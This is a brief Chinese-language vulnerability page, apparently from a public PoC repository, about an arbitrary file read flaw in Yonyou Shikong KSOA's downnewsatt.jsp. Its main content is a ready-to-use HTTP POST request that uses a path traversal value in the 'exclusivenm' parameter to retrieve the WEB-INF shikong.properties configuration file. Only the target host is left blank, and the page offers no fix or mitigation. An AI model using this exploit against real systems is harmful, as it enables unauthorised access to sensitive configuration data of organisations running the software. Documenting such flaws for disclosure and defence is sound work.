用友时空KSOA downnewsatt.jsp 存在任意文件读取漏洞

2025-11-20 用友时空KSOA PoC Public

Description

用友时空KSOA downnewsatt.jsp 存在任意文件读取漏洞,攻击者可获取系统内部配置文件敏感信息

PoC

POST /newspublish/downnewsatt.jsp HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

exclusivenm=../../WEB-INF/classes/shikong.properties

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities